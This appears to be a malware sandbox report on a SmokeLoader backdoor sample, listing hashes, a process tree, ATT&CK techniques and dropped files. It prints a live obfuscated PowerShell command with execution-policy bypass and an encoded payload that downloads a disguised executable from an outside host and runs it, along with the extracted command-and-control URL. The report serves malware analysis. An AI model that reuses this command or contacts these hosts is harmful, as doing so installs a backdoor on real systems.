Overview

overview

10

Static

static

2c2cb2aa07...79.exe

windows7_x64

10

2c2cb2aa07...79.exe

windows10_x64

10

Analysis

  • max time kernel
    110s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    13-04-2021 08:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2c2cb2aa0782874d3c14cdd6f063f979.exe

  • Size

    847KB

  • MD5

    2c2cb2aa0782874d3c14cdd6f063f979

  • SHA1

    583c43ca939f9d8a4eea53a7d71157ac3571a350

  • SHA256

    c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

  • SHA512

    34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Score
10/10
smokeloaderbackdoortrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://u.teknik.io/bHrgG.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.114.59/1/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe
    "C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3568
        • C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
          "C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
          4⤵
          • Executes dropped EXE
          • Maps connected drives based on registry
          • Suspicious behavior: MapViewOfSection
          PID:3972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    MD5

    b751492c41c6f3173d3b6f31c1b9b4eb

    SHA1

    abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

    SHA256

    ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

    SHA512

    afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    47c7502dd3a1ed3c4dec6145c71167af

    SHA1

    d6efbc9e710bf4989c2461509aa452a15a6a2976

    SHA256

    2c08e6467c151572b8f3edbbc885ccd89dcf77bb4d09dba12cf748f11f4c7144

    SHA512

    2a7de53528d8f645a3babc7799d9b6cbaa55e477bf32208edf5880ece06b9606d8ded70be3019cbb9d5fcda584b44c6fd1a5c5e070e112b0549884719df4af74

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
    MD5

    3cf58ec9de521b32015552ca3024d1cd

    SHA1

    539236ecd9d859f82f89311bfd564906aa98451e

    SHA256

    ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

    SHA512

    25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
    MD5

    3cf58ec9de521b32015552ca3024d1cd

    SHA1

    539236ecd9d859f82f89311bfd564906aa98451e

    SHA256

    ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

    SHA512

    25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

    Download Submit
  • memory/2704-126-0x0000000008B10000-0x0000000008B11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-127-0x0000000008BE0000-0x0000000008BE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-122-0x00000000081F0000-0x00000000081F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-123-0x0000000008440000-0x0000000008441000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-124-0x00000000084B0000-0x00000000084B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-125-0x00000000082F0000-0x00000000082F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-120-0x0000000007492000-0x0000000007493000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-121-0x0000000008150000-0x0000000008151000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-170-0x0000000007494000-0x0000000007496000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2704-169-0x0000000007493000-0x0000000007494000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-114-0x0000000000000000-mapping.dmp
    Download
  • memory/2704-117-0x0000000005030000-0x0000000005031000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-118-0x0000000007AD0000-0x0000000007AD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2704-119-0x0000000007490000-0x0000000007491000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2708-168-0x0000000000890000-0x00000000008A5000-memory.dmp
    Filesize

    84KB

    Download
  • memory/2708-167-0x00000000008B0000-0x00000000008B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-140-0x0000000006DA2000-0x0000000006DA3000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-155-0x000000000A650000-0x000000000A651000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-154-0x0000000006EF0000-0x0000000006EF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-153-0x0000000009640000-0x0000000009641000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-148-0x0000000006DA3000-0x0000000006DA4000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-147-0x0000000009050000-0x0000000009051000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-146-0x0000000009AD0000-0x0000000009AD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-139-0x0000000006DA0000-0x0000000006DA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3568-128-0x0000000000000000-mapping.dmp
    Download
  • memory/3972-160-0x0000000000000000-mapping.dmp
    Download